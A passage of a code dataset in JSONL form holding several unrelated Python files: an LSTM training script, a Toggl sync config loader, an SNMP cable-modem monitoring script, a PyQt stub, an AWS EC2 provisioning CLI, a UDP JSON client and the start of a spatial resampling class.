print(\"get_data(x_train) took:\", finish-start)\n\n # Populate y_train\n #print(\"Populating y_train...\")\n start = time.time()\n get_data(filename=tr_labels, filetype='xml', mode=\"y\", data=y_train)\n finish = time.time()\n print(\"get_data(y_train) took:\", finish-start)\n\n # Populate x_val\n #print(\"Populating x_val...\")\n start = time.time()\n get_data(filename=val, labelfile=val_labels, filetype='xml', mode=\"x\", data=x_val, word_index=validation_widx)\n finish = time.time()\n print(\"get_data(x_val) took:\", finish-start)\n\n # Populate y_val\n #print(\"Populating y_val...\")\n start = time.time()\n get_data(filename=val_labels, filetype='xml', mode=\"y\", data=y_val)\n finish = time.time()\n print(\"get_data(y_val) took:\", finish-start)\n\n # Populate x_test\n #print(\"Populating x_test...\")\n start = time.time()\n get_data(filename=te, labelfile=te_labels, filetype='xml', mode='x', data=x_test, word_index=test_widx)\n finish = time.time()\n print(\"get_data(x_test) took:\", finish-start)\n\n # Populate y_test\n #print(\"Populating y_test...\\n\")\n start = time.time()\n get_data(filename=te_labels, filetype='xml', mode='y', data=y_test)\n finish = time.time()\n print(\"get_data(y_test) took:\", finish-start)\n\n print(\"Shuffling data...\", end='')\n start = time.time()\n x_train = np.array(x_train)\n y_train = np.array(y_train)\n \n x_val = np.array(x_val)\n y_val = np.array(y_val)\n\n x_test = np.array(x_test)\n y_test = np.array(y_test)\n \n _remove_long_seq = sequence._remove_long_seq\n\n # Makes random numbers predictable based on (seed)\n np.random.seed(seed)\n\n # Returns an array of evenly spaced values ranged [0, len(x_train))\n # In english = it's getting an array of the indices of x_train\n # E.G. if len(x_train) = 3, indices => [0,1,2]\n indices = np.arange(len(x_train))\n\n # Shuffles the contents of indices\n np.random.shuffle(indices)\n\n # Rearranges x_train to match ordering of indices\n # x_train is normally x_train[0], x_train[1], x_train[2]\n # if indices = [0,2,1], then x_train[indices] => x_train[0], x_train[2], x_train[1]\n x_train = x_train[indices]\n y_train = y_train[indices]\n\n # Repeat above for validation set\n indices = np.arange(len(x_val))\n np.random.shuffle(indices)\n x_val = x_val[indices]\n y_val = y_val[indices]\n\n # Repeat above for the test set\n indices = np.arange(len(x_test))\n np.random.shuffle(indices)\n x_test = x_test[indices]\n y_test = y_test[indices]\n\n finish = time.time()\n print(finish-start)\n\n # Append all datasets\n print(\"Concatenating...\", end='')\n start = time.time()\n xs = np.concatenate([x_train, x_val, x_test])\n ys = np.concatenate([y_train, y_val, y_test])\n finish = time.time()\n print(finish-start)\n\n print(\"start_char/index_from...\", end='')\n start = time.time()\n if start_char is not None:\n # Adds a start_char to the beginning of each sentence\n xs = [[start_char] + [w + index_from for w in x] for x in xs]\n elif index_from:\n # This shifts the indexes by index_from\n xs = [[w + index_from for w in x] for x in xs]\n finish = time.time()\n print(finish-start)\n\n # Trims sentences down to maxlen\n print(\"Maxlen...\", end='')\n start = time.time()\n if maxlen:\n xs, ys = _remove_long_seq(maxlen, xs, ys)\n if not xs:\n raise ValueError('After filtering for sequences shorter than maxlen=' +\n str(maxlen) + ', no sequence was kept. Increase maxlen.')\n finish = time.time()\n print(finish-start)\n\n # Calculates the max val in xs\n print(\"Num_words = max...\", end='')\n start = time.time()\n if not num_words:\n num_words = max([max(x) for x in xs])\n finish = time.time()\n print(finish-start)\n\n # By convention, use 2 as OOV word\n # Reserve 'index_from' (3 by default) characters:\n # 0 => padding, 1 => start, 2 => OOV\n print(\"Skip_top/num_words/oov...\", end='')\n start = time.time()\n if oov_char is not None:\n # If a word is OOV, replace it w/ 2\n # Also remove any words that are < skip_top or > num_words\n xs = [[w if (skip_top <= w < num_words) else oov_char for w in x] for x in xs]\n else:\n # Only remove words that are < skip_top or > num_words\n xs = [[w for w in x if skip_top <= w < num_words] for x in xs]\n finish = time.time()\n print(finish-start)\n\n train_idx = len(x_train)\n val_idx = len(x_val)\n\n print(\"Partitioning...\", end='')\n start = time.time()\n # Partition the newly preprocessed instances back into their respective arrays\n x_train, y_train = np.array(xs[:train_idx]), np.array(ys[:train_idx])\n x_val, y_val = np.array(xs[train_idx:(train_idx+val_idx)]), np.array(ys[train_idx:(train_idx+val_idx)])\n x_test, y_test = np.array(xs[(train_idx+val_idx):]), np.array(ys[(train_idx+val_idx):])\n finish = time.time()\n print(finish-start, \"\\n\")\n return (x_train, y_train), (x_val, y_val), (x_test, y_test)\n\ndef get_pretrained_embeddings(tr_widx, embedding_file):\n\n with open(tr_widx, 'r') as w:\n word_index = {}\n word_index = json.load(w)\n \n # First, read in the embedding_index\n # Reference begin: https://blog.keras.io/using-pre-trained-word-embeddings-in-a-keras-model.html\n EMBEDDING_DIM = 300\n\n print(\"Loading word2vec binary...\", end='')\n start = time.time()\n # Takes about 50 seconds\n embedding = KeyedVectors.load_word2vec_format(embedding_file, binary=True)\n finish = time.time()\n print(finish-start, \"\\n\")\n \n print(\"Generating embedding matrix...\", end='')\n start = time.time()\n\n embedding_matrix = np.zeros((len(word_index) + 1, EMBEDDING_DIM))\n with tqdm(total=len(word_index), unit='it', unit_scale=True, unit_divisor=1024) as pbar:\n i = 0\n unk_words = []\n for word in word_index:\n if word in embedding.wv.vocab:\n embedding_vector = embedding.wv[word]\n if embedding_vector is not None:\n embedding_matrix[i] = embedding_vector\n else:\n unk_words.append(word)\n \n pbar.update()\n i += 1\n\n finish = time.time()\n print(finish-start)\n print(\"Num of words in corpus vocabulary not found in word2vec embedding:\", len(unk_words))\n\n return embedding_matrix\n # Reference end\n\ndef main(tr, tr_labels, val, val_labels, te, te_labels):\n start = time.time()\n # Build training set word index\n print(\"\\nBuilding training word index...\")\n create_word_index(datafile=tr, labelfile=tr_labels, mode=\"training\")\n finish = time.time()\n print(\"Building training widx took:\", finish - start, \"\\n\")\n\n start = time.time()\n # Build validation set word index\n print(\"Building validation word index...\")\n create_word_index(datafile=val, labelfile=val_labels, mode=\"validation\")\n finish = time.time()\n print(\"Building validation widx took:\", finish-start, \"\\n\")\n\n start = time.time()\n # Build test set word index\n print(\"Building test word index...\")\n create_word_index(datafile=te, labelfile=te_labels, mode=\"test\")\n finish = time.time()\n print('Building test widx took:', finish-start, \"\\n\")\n\n # Load configuration\n with open('run.json', 'r') as j:\n config = {}\n config = json.load(j)\n\n max_features = config['max_features'] # Word Embedding #default 20000\n skip_top = config['skip_top'] # Skip the most common words #default 0\n num_words = config['num_words'] # Upper limit for word commonality #default 0\n maxlen = config['maxlen'] # Maximum length of a sequence (sentence) #default 80\n\n start = time.time()\n # Load and preprocess data\n (x_train, y_train), (x_val, y_val), (x_test, y_test) = load_data(tr, tr_labels, val, val_labels, te, te_labels,\n skip_top=skip_top, num_words=num_words, maxlen=None)\n finish = time.time()\n print(\"Load_data took a total of:\", finish-start)\n \n # ML Stuff now\n print(len(x_train), 'train sequences')\n print(len(x_val), 'validation sequences')\n print(len(x_test), 'test sequences\\n')\n\n print('Pad sequences (samples x time)...', end='')\n start = time.time()\n x_train = sequence.pad_sequences(x_train, maxlen=maxlen)\n x_val = sequence.pad_sequences(x_val, maxlen=maxlen)\n x_test = sequence.pad_sequences(x_test, maxlen=maxlen)\n finish = time.time()\n print(finish-start)\n\n batch_size = config['batch_size'] # Number of instances before updating weights #default 32\n epochs = config['epochs'] # Number of epochs #default 15\n\n # If we don't want any of these optional args,\n # we will have to remove them from the LSTM call itself\n go_backwards = True if (config['go_backwards'] == \"True\") else False\n dropout = config['dropout']\n recurrent_dropout = config['recurrent_dropout']\n #bias_regularizer = config['bias_regularizer']\n\n print('Build model...')\n\n # Obtain and compute embedding matrix\n print(\"Get pretrained word embeddings...\")\n embedding_matrix = get_pretrained_embeddings( 'data/word_indexes/training.json',\n 'data/embeddings/GoogleNews-vectors-negative300.bin')\n\n model = Sequential()\n\n start = time.time()\n #model.add(Embedding(max_features, 128))\n \n with open('data/word_indexes/training.json', 'r') as f:\n word_index = {}\n word_index = json.load(f)\n\n EMBEDDING_DIM = 300\n model.add(Embedding(len(word_index) + 1,\n EMBEDDING_DIM,\n weights=[embedding_matrix],\n input_length=maxlen,\n trainable=False))\n \n finish = time.time()\n print(\"adding embedding layer took:\", finish-start)\n\n start = time.time()\n model.add(LSTM( 128, #bias_regularizer = bias_regularizer, \n dropout=dropout, recurrent_dropout=recurrent_dropout, \n go_backwards=go_backwards))\n finish = time.time()\n print(\"adding LSTM layer took:\", finish-start)\n\n start = time.time()\n model.add(Dense(1, activation='sigmoid'))\n finish = time.time()\n print(\"adding Dense sigmoid:\", finish-start)\n\n start = time.time()\n model.compile(loss='binary_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\n finish = time.time()\n print(\"Compiling model took:\", finish-start)\n\n print(model.summary())\n\n start = time.time()\n history = model.fit(x_train, y_train,\n batch_size=batch_size,\n epochs=epochs,\n validation_data=(x_val, y_val),\n verbose=1)\n finish = time.time()\n print(\"Fitting model took:\", finish-start)\n # Plot training & validation accuracy values\n plt.plot(history.history['acc'])\n plt.plot(history.history['val_acc'])\n plt.title('Model accuracy')\n plt.ylabel('Accuracy')\n plt.xlabel('Epoch')\n plt.legend(['Train', 'Validation'], loc='upper left')\n plt.yticks(np.arange(0.4, 1.0, 0.05))\n\n\n plot_prefix = str(int(tr.split('/')[-1].split('.')[0]) + int(val.split('/')[-1].split('.')[0]) + int(te.split('/')[-1].split('.')[0]))\n #plot_prefix = plot_prefix.split('.')[0]\n plot_name = plot_prefix + '.png'\n plot_name = 'results/runs/' + plot_name\n plot_config = 'results/runs/' + plot_prefix + '.config'\n\n i = 1\n jpg = '.jpg'\n conf = '.config'\n if os.path.exists(plot_name):\n n = plot_name.split('.')[0]\n plot_name = n + '_' + str(i) + jpg\n plot_config = n + '_' + str(i) + conf\n if os.path.exists(plot_name):\n while os.path.exists(plot_name):\n n = plot_name.split('.')[0]\n n = n.split('_')[0]\n plot_name = n + '_' + str(i) + jpg\n plot_config = n + '_' + str(i) + conf\n i += 1\n \n plt.savefig(plot_name)\n with open(plot_config, 'w') as f:\n json.dump(config, f, indent=4)\n #plt.show()\n\n # Plot training & validation loss values\n #plt.plot(history.history['loss'])\n #plt.plot(history.history['val_loss'])\n #plt.title('Model loss')\n #plt.ylabel('Loss')\n #plt.xlabel('Epoch')\n #plt.legend(['Train', 'Validation'], loc='upper left')\n #plt.show()\n #print(\"val_loss:\\t\", history['val_loss'])\n #print(\"val_acc:\\t\", history['val_acc'])\n #print(\"loss:\\t\\t\", history['loss'])\n #print(\"acc:\\t\\t\", history['acc'])\n\n # DO NOT UNCOMMENT THIS\n #score, acc = model.evaluate(x_test, y_test,\n # batch_size=batch_size)\n #print('Test score:', score)\n #print('Test accuracy:', acc)\n\nif __name__ == '__main__':\n main(*parse_options())\n","sub_path":"hp_lstm_old.py","file_name":"hp_lstm_old.py","file_ext":"py","file_size_in_byte":26601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"373161464","text":"import os\nfrom enum import Enum\n\nfrom yaml import safe_load\n\n\nclass Colors(Enum):\n ADD = \"green\"\n UPDATE = \"yellow\"\n IMPORTANT = \"yellow\"\n ERROR = \"red\"\n\n\nclass Entry:\n def __init__(\n self,\n label,\n redmine_api_key=None,\n toggl_api_key=None,\n jira_username=None,\n jira_url=None,\n task_patterns=None,\n ):\n self.label = label\n self.redmine_api_key = redmine_api_key\n self.toggl = toggl_api_key\n self.jira_username = jira_username\n self.jira_url = jira_url\n self.task_patterns = task_patterns\n\n def __str__(self):\n if self.redmine_api_key:\n return \"{}: {}\".format(self.toggl, self.redmine_api_key)\n else:\n return \"{}: {}@{}\".format(self.toggl, self.jira_username, self.jira_url)\n\n\nclass Config:\n def __init__(self, toggl, redmine, entries, mattermost):\n self.toggl = toggl\n self.redmine = redmine\n self.entries = entries\n self.mattermost = mattermost\n\n @classmethod\n def fromFile(cls, path=\"config.yml\"):\n if not os.path.exists(path):\n raise Exception(\n \"File {} does not exist. Check out config.yml.example and create config.yml\".format(\n path\n )\n )\n\n with open(path) as input:\n return Config.fromYml(input)\n\n @classmethod\n def fromYml(cls, yml):\n deserialized = safe_load(yml)\n\n if \"toggl\" not in deserialized:\n raise Exception('\"toggl\" element not found in config')\n\n toggl = deserialized[\"toggl\"]\n\n redmine = deserialized.get(\"redmine\", None)\n\n if \"mattermost\" in deserialized:\n if isinstance(deserialized[\"mattermost\"], str):\n print(\"Warning: old config format\")\n\n mattermost = {\"url\": deserialized[\"mattermost\"]}\n else:\n mattermost = deserialized[\"mattermost\"]\n\n if \"url\" not in mattermost:\n raise Exception('Expected \"url\" param in \"mattermost\" section')\n\n else:\n mattermost = None\n\n if \"entries\" not in deserialized:\n raise Exception('\"entries\" element not found in config')\n\n entries = []\n\n for entry in deserialized[\"entries\"]:\n entries.append(Entry(**entry))\n\n return cls(toggl, redmine, entries, mattermost)\n\n def __str__(self):\n return \"\"\"config:\n\\ttoggl url:\\t{}\n\\tredmine url:\\t{}\n\n\\tentries:\n\\t\\t{}\"\"\".format(\n self.toggl, self.redmine, \"\\n\\t\\t\".join([str(e) for e in self.entries])\n )\n\n\nif __name__ == \"__main__\":\n config = Config()\n print(config)\n","sub_path":"togglsync/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"30949977","text":"import netsnmp\nimport binascii\nimport netaddr\nfrom netaddr import *\nfrom datetime import datetime\nimport csv\nimport ipaddress\n\n\n# open a file to stuff results in\nf=open('testresult', 'a')\n\n#append a timestamp to the file each time this program is run\nf.write(\"\\n\\n\\n\")\nsttime = datetime.now().strftime('%Y%m%d_%H:%M:%S')\nf.write(sttime + '\\n')\nf.write(\"\\n\")\n\n\n#info for the target CMTS\nhost_ipa=\"10.10.10.10\"\ncomm_string=\"public01\"\n\n\n#info for cable modems\ncm_comm_string=\"public\"\n\n\n# set up netsnmp session for that CMTS\nsession=netsnmp.Session(Version=2, Community=comm_string, DestHost=host_ipa, UseNumeric=1)\n\n\n\n\n# poll CMTS for list of registered modem MAC addresses using DOCS-IF3-MIB\n# this will return a list of MAC Addresses that are remembered. May not all be registered.\noid=netsnmp.VarList(netsnmp.Varbind(\".1.3.6.1.4.1.4491.2.1.20.1.3.1.2\"))\nresult=session.walk(oid)\n\n\n#maclist1 is a new vector to store the formatted mac addresses\nmaclist1=[]\n\n\n# convert mac addresses to something readable\nfor item in result:\n mac=str(netaddr.EUI(binascii.hexlify(item).decode('utf-8'), dialect=netaddr.mac_unix))\n print (mac)\n maclist1.append(mac)\n\n# create a 2D list that will be used to store the data in a .csv file\nw = 11\nh = len(result)\n\n\nmatrix = [[0 for x in range(w)] for y in range(h)]\n\n# write the mac addresses in the first column of the matrix to be used for .csv file\n\nfor i, item in enumerate(maclist1, start=0):\n matrix[i][0] = item\n\n\n\n# write the mac addresses to the local file\nf.write(\"MAC addresses from DOCS-IF3-MIB\\n\")\ns=str(maclist1)\nf.write(s)\nf.write(\"\\n\")\n\n# get modem registration status (CMTS view)\noid=netsnmp.VarList(netsnmp.Varbind(\".1.3.6.1.4.1.4491.2.1.20.1.3.1.6\"))\nregstat=session.walk(oid)\n\nnumber_of_reg_modems=0\n\n# put regstat in second column of matrix used for .csv file\nfor i, item in enumerate(regstat, start=0):\n item = int(item)\n matrix[i][1] = item\n if matrix[i][1] == 8:\n number_of_reg_modems += 1\n\n# count the number of modems that are actually registered (status = 8)\n\n#print \"\\nThere are \", number_of_reg_modems, \" registered modems\\n\\n\"\nprint()\nprint(\"There are \", number_of_reg_modems, \"registered modems\")\nprint()\n\n\n\n\n\n# iplist1 is a new vector to store the formatted IP addresses\niplist1=[]\n\n#get the list of IPv4 addresses for registered modems\nIPv4oid=netsnmp.VarList(netsnmp.Varbind(\".1.3.6.1.4.1.4491.2.1.20.1.3.1.5\"))\nIPv4result=session.walk(IPv4oid)\n\n#print(IPv4result)\n\n\nfor i, item in enumerate(IPv4result, start=0):\n# print(item)\n v = ipaddress.ip_address(item).exploded\n # print(v)\n iplist1.append(v)\n matrix[i][2] = v\n\n#print(iplist1)\n\n\n#write IP addresses to local file\nf.write(\"IP addresses from DOCSIS-IF3-MIB\\n\")\ns=str(iplist1)\nf.write(s)\nf.write(\"\\n\")\n\n\n\n#get recieve MER from CMTS for each modem\ncmts_rx_mer_oid=netsnmp.VarList(netsnmp.Varbind(\".1.3.6.1.4.1.4491.2.1.28.1.4.1.2\"))\ncmts_rx_mer_result=session.walk(cmts_rx_mer_oid)\n\n\nprint()\nprint(\"these are the RX MERs at CMTS\")\n\n\nfor i, item in enumerate(cmts_rx_mer_result, start = 0):\n item = int(item)/100\n matrix[i][3] = item\n print(item)\n\n\n\n\n\n\n\n\n#get CMTS downstream Tx power\ncmts_tx_power_oid=netsnmp.VarList(netsnmp.Varbind(\".1.3.6.1.4.1.4491.2.1.28.1.22.1.3\"))\ncmts_tx_power_result=session.walk(cmts_tx_power_oid)\n\nprint(\"\\n\")\nprint(\"this is the CMTS transmit power\")\nprint(cmts_tx_power_result)\nprint(\"\\n\")\n\n\n\n\n\n# set up netsnmp session for modems\n\n\n\nprint(\"\\n\")\nprint(\"printing CM xmit power and RX mer\")\nprint(\"\\n\")\n\n\nfor item in iplist1:\n\n session=netsnmp.Session(Version=2, Community=cm_comm_string, DestHost=item, UseNumeric=1)\n cm_xmit_power_oid=netsnmp.VarList(netsnmp.Varbind(\".1.3.6.1.4.1.4491.2.1.28.1.13.1.10\"))\n cm_xmit_power_result=session.walk(cm_xmit_power_oid)\n\n for i, item in enumerate(cm_xmit_power_result, start = 0):\n item = int(item)/10\n matrix[i][4] = item\n print(\"cm xmit power\")\n print(item)\n\n\n cm_rx_power_oid=netsnmp.VarList(netsnmp.Varbind(\".1.3.6.1.4.1.4491.2.1.28.1.11.1.3\"))\n cm_rx_power_result=session.walk(cm_rx_power_oid)\n\n for i, item in enumerate(cm_rx_power_result, start = 0):\n item = int(item)\n matrix[i][5] = item\n print(\"cm rx power\")\n print(item)\n\n\n\n\n\n#close that local file\nf.close()\n\n\n\n#open a new .csv file to write the matrix into, this is openable with Excel.\n\nwith open(sttime+'.csv', 'w', newline='') as f:\n writer = csv.writer(f, delimiter=',', quoting=csv.QUOTE_MINIMAL)\n for row in matrix:\n writer.writerow(row)\nf.close()\n\n\n","sub_path":"mer.py","file_name":"mer.py","file_ext":"py","file_size_in_byte":4548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"550752109","text":"import sys\nfrom PyQt5.QtCore import*\nfrom PyQr5.QtWidgets import*\n\nclass MaWindow(QMainWindow):\n\n def __init__(self, parent = None):\n super(MaWindow, self).__init__(parent)\n self.show()\n\ndef main(args):\n print(\"main\")\n app = QApplication(args)\n mainw = MaWindow()\n app.exec()\n\nif __name__ == \"__main__\":\n print(\"__main__\")\n main(sys.argv)\n","sub_path":"QmainWindonw.py","file_name":"QmainWindonw.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"135486061","text":"import argparse\nimport re\nimport sys\n\nfrom collections import defaultdict\nfrom concurrent.futures import as_completed\nfrom concurrent.futures import ThreadPoolExecutor\n\nimport yaml\n\nfrom botocore.exceptions import NoCredentialsError\nfrom botocore.exceptions import NoRegionError\n\nfrom smartaws import cfg\nfrom smartaws import log\nfrom smartaws import __version__ as version\n\nfrom smartaws.ec2 import dhcp_options_set\nfrom smartaws.ec2 import internet_gateway\nfrom smartaws.ec2 import route_table\nfrom smartaws.ec2 import security_group\nfrom smartaws.ec2 import subnet\nfrom smartaws.ec2 import vpc\n\n\nlogger = log.get_logger(__name__)\n\n\n# This list defines the order in which EC2 resources are created, updated or deleted\nec2_resource_types = [\n 'dhcp_options_sets',\n 'internet_gateways',\n 'vpcs',\n 'subnets',\n 'route_tables',\n 'security_groups'\n]\n\n# This data structure is a mapping between the YAML node name for a\n# specific EC2 resource type and the corresponding implementation\nec2_resource_mapping = {\n 'dhcp_options_sets': dhcp_options_set,\n 'internet_gateways': internet_gateway,\n 'route_tables': route_table,\n 'subnets': subnet,\n 'security_groups': security_group,\n 'vpcs': vpc\n}\n\n# Parsing for the command line arguments\nparser = argparse.ArgumentParser(description='Smartaws v{}'.format(version))\nsubparsers = parser.add_subparsers(help='commands', dest='command')\n\n# Create command\ncreate_parser = subparsers.add_parser(\n 'create',\n help='Create AWS resources'\n)\n\ncreate_parser.add_argument(\n '--configuration', '-c',\n metavar='in-file',\n type=argparse.FileType('rt'),\n required=True,\n help='YAML configuration file for AWS resources'\n)\n\ncreate_parser.add_argument(\n '--filter', '-f',\n action='store',\n help='Select resources whose name match the given regular expression'\n)\n\ncreate_parser.add_argument(\n '--workers', '-w',\n action='store',\n help='Maximum number of parallel workers'\n)\n\ncreate_parser.add_argument(\n '--show-target-resources', '-s',\n default=False,\n action='store_true',\n help='Display target AWS resources without performing any operation'\n)\n\n# Update command\nupdate_parser = subparsers.add_parser(\n 'update',\n help='Update existing AWS resources'\n)\n\nupdate_parser.add_argument(\n '--configuration', '-c',\n metavar='in-file',\n type=argparse.FileType('rt'),\n required=True,\n help='YAML configuration file for AWS resources'\n)\n\nupdate_parser.add_argument(\n '--filter', '-f',\n action='store',\n help='Select resources whose name match the given regular expression'\n)\n\nupdate_parser.add_argument(\n '--workers', '-w',\n action='store',\n help='Maximum number of parallel workers'\n)\n\nupdate_parser.add_argument(\n '--show-target-resources', '-s',\n default=False,\n action='store_true',\n help='Display target AWS resources without performing any operation'\n)\n\n# Delete command\ndelete_parser = subparsers.add_parser(\n 'delete',\n help='Delete AWS resources'\n)\n\ndelete_parser.add_argument(\n '--configuration', '-c',\n metavar='in-file',\n type=argparse.FileType('rt'),\n required=True,\n help='YAML configuration file for AWS resources'\n)\n\ndelete_parser.add_argument(\n '--filter', '-f',\n action='store',\n help='Select resources whose name match the given regular expression'\n)\n\ndelete_parser.add_argument(\n '--workers', '-w',\n action='store',\n help='Maximum number of parallel workers'\n)\n\ndelete_parser.add_argument(\n '--show-target-resources', '-s',\n default=False,\n action='store_true',\n help='Display target AWS resources without performing any operation'\n)\n\n\ndef show_target_resources(conf, pattern):\n \"\"\"Display the configuration objects matching the given regex.\"\"\"\n\n target_resources = defaultdict(list)\n\n for resource_type in ec2_resource_types:\n for ctx in getattr(conf, resource_type):\n if pattern.match(ctx.get('name')):\n target_resources[resource_type].append(ctx.get('name'))\n\n logger.info('Resources that match the filter:')\n\n for resource_type, resources in target_resources.items():\n logger.info('%s:', resource_type)\n for resource in resources:\n logger.info(' └ %s', resource)\n\n\ndef manage_resources(conf, pattern, max_workers, action=None, resource_types=None):\n \"\"\"Create, update or delete EC2 resources.\"\"\"\n\n logger.info('Starting AWS configuration...')\n\n credentials = conf.credentials\n\n for resource_type in resource_types:\n # Get the relevant module to manage objects\n # identified by ``resource_type``\n module = ec2_resource_mapping[resource_type]\n\n # Apply the filter to configuration\n contexts = [\n ctx for ctx in getattr(conf, resource_type)\n if pattern.match(ctx.get('name'))\n ]\n\n tasks = []\n\n for ctx in contexts:\n try:\n handler = module.create_handler(ctx, credentials)\n tasks.append(getattr(handler, action))\n except NoRegionError:\n logger.error('You must specify a target AWS region.')\n sys.exit(1)\n\n # Using a ``concurrent.futures.ThreadPoolExecutor`` to\n # avoid waiting for blocking calls to the Amazon API\n with ThreadPoolExecutor(max_workers=max_workers) as executor:\n futures = [executor.submit(task) for task in tasks]\n for future in as_completed(futures):\n try:\n future.result()\n except NoCredentialsError:\n logger.error('Unable to locate AWS security credentials.')\n sys.exit(1)\n\n\ndef run():\n \"\"\"Program main entry point.\"\"\"\n\n # Workaround to display help if 'smartaws'\n # command is called without any argument\n if len(sys.argv) == 1:\n parser.print_help()\n sys.exit(1)\n\n args = parser.parse_args()\n\n logger.info('Loading configuration from file %s.', args.configuration.name)\n\n # Load the configuration\n with args.configuration as stream:\n try:\n settings = yaml.load(stream)\n except yaml.YAMLError as exc:\n logger.error(exc)\n sys.exit(1)\n\n # Validate the configuration\n try:\n conf = cfg.BaseConfig(settings)\n except ValueError as exc:\n logger.error(exc)\n sys.exit(1)\n\n # This regular expression is used to target specific resources\n regex = args.filter if args.filter else '.*'\n pattern = re.compile(regex)\n\n if args.show_target_resources:\n show_target_resources(conf, pattern)\n sys.exit(0)\n\n if args.command == 'create':\n max_workers = args.workers or 4\n manage_resources(conf, pattern, max_workers,\n action='create_resource',\n resource_types=ec2_resource_types)\n\n elif args.command == 'update':\n max_workers = args.workers or 4\n manage_resources(conf, pattern, max_workers,\n action='update_resource',\n resource_types=ec2_resource_types)\n\n elif args.command == 'delete':\n max_workers = args.workers or 4\n manage_resources(conf, pattern, max_workers,\n action='delete_resource',\n resource_types=reversed(ec2_resource_types))\n","sub_path":"smartaws/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"383304593","text":"import socket\nimport json\n\nclass UDPClient():\n def __init__(self, host, port):\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.host = host\n self.port = port\n \n def send(self, dat):\n js = json.dumps(dat)\n print(\"Length: %d, %s\" % (len(js), js))\n self.sock.sendto(js.encode(\"UTF-8\"), (self.host, self.port))","sub_path":"udpclient.py","file_name":"udpclient.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"163667620","text":"from .spatialHelpers import *\nfrom qgis.core import QgsField, QgsVectorLayer, QgsSpatialIndex, QgsMessageLog, QgsCoordinateReferenceSystem, QgsCoordinateTransform\nimport processing\n\nfrom qgis.PyQt.QtCore import QVariant, QSettings\ntry:\n import pandas as pd\n import numpy as np\nexcept:\n pass\nimport os\nfrom datetime import datetime as dt\nfrom .LookupLogger import LookupLogger\nfrom shutil import rmtree\n\nclass SpatialTemporalResampler:\n # Class that takes spatial data (QgsVectorLayers), associates them with a time and\n # allows them to be spatially resampled to output polygons based on attribute values\n # Also supports a single value for all space via same interface\n # Data can be queried in a tabular way via Pandas data frames\n\n def __init__(self, logger=LookupLogger()):\n '''\n :param logger: LookupLogger object (optional) to record the results of disaggregations and lookups\n '''\n self.logger = logger\n # Set up output shapefile fields\n self.templateShapefile = None\n self.templateEpsgCode = None\n self.templateIdField = None\n self.featureMapper = None # Mapping from desired feature id : actual feature ID (dict) for referencing use\n self.outputLayer = None # actual qgsVectorLayer\n # \"raw\" data fields\n self.dataLayers = None # pd.Series of resampled QgsVectorLayer objects, or single numbers, indexed by time. Wm-2\n self.attributeTables = None # pd.Series of data frames that each contain a copy of the relevant dataLayer's data. Improves performance when looking up values.\n self.attribute = None # pd.series of strings, indexed by time, that indicate which QgsVectorLayer field to use for the variable of interest\n self.areas = None # Area of each polygon to save having to do it on the fly each time\n\n def setOutputShapefile(self, shapefile, epsgCode, id_field):\n ''' Output polygons that will be produced. If inputs are different polygons, result will be area-weighted mean of intersected input polygon(s)\n shapefile: str OR QgsVectorLayer: The shapefile to use\n epsgCode: numeric EPSG code of shapefile coord system. This is needed to prevent popups asking the same\n id_field: The field of the shapefile that acts as a unique identifier for each feature.'''\n\n self.templateIdField = id_field\n self.templateEpsgCode = int(epsgCode)\n\n if id_field is None:\n raise ValueError('Shapefile ID field cannot be empty')\n\n if type(shapefile) is str:\n if not os.path.exists(shapefile):\n raise ValueError('Shapefile: ' + shapefile + ' does not exist')\n # Try and load a copy of the shapefile into memory. Allow explosion if fails.\n\n self.outputLayer = openShapeFileInMemory(shapefile, targetEPSG=self.templateEpsgCode, label='Template layer')\n\n if type(shapefile) is QgsVectorLayer:\n self.outputLayer = shapefile\n\n print('output layer', self.outputLayer)\n # Ensure the ID field exists\n fields = get_field_names(self.outputLayer)\n if id_field not in fields:\n raise ValueError('ID Field ' + str(id_field) + ' not present in output shapefile')\n\n # Refer to features by an ID in the shapefile attributes rather than (numeric) feature ID, if desired\n self.templateIdField = id_field\n # Create mapping from real (numeric) feature ID to desired (string) feature ID\n a = shapefile_attributes(self.outputLayer)[id_field]\n self.featureMapper = pd.Series(index = a.index, data = list(map(intOrString, a.values)))\n\n # record what was used to label features\n if self.logger is not None:\n self.logger.addEvent('Disagg', None, None, None, 'Labelling features using ' + id_field + ' for ' + str(shapefile))\n\n # Record area of each polygon and label as the user desires\n self.areas = pd.Series(feature_areas(self.outputLayer))\n self.areas.index = self.featureMapper[self.areas.index]\n\n def getOutputShapefile(self):\n return self.outputLayer\n\n def getOutputFeatureIds(self):\n return list(shapefile_attributes(self.outputLayer).keys())\n\n def dealWithSingleValue(self, value, startTime, attributeToUse):\n ''' Create a QgsVectorLayer based on self.outputLayer with field attributeToUse the same value all the way through '''\n\n if type(startTime) is not type(dt.now()):\n raise ValueError('Start time must be a DateTime object')\n\n if startTime.tzinfo is None:\n raise ValueError('Start time must have a time zone attached')\n\n try:\n value = float(value)\n except:\n raise ValueError('Value must be float() or convertible to a float()')\n #self.logger.addEvent('Disagg', None, None, None, 'Single value given for layer: Assigning this value to all features')\n\n # Create a layer with all entries set to the chosen vanlue\n nl = duplicateVectorLayer(self.outputLayer, targetEPSG=self.templateEpsgCode)\n nl = addNewField(nl, attributeToUse, initialValue=value)\n\n return self.updateLayers([attributeToUse], nl, startTime)\n\n def dealWithVectorLayer(self, shapefileInput, epsgCode, startTime, attributeToUse, weight_by, inputIdField):\n ''' Loads, resamples and populates object with an input vector layer for use when needed\n :param shapefileInput: Filename of shapefile to be (dis)aggregated\n :param epsgCode: EPSG code of vector layer\n :param startTime: datetime() object: the date of the period represented by this shapefile's data. Time ignored.\n :param 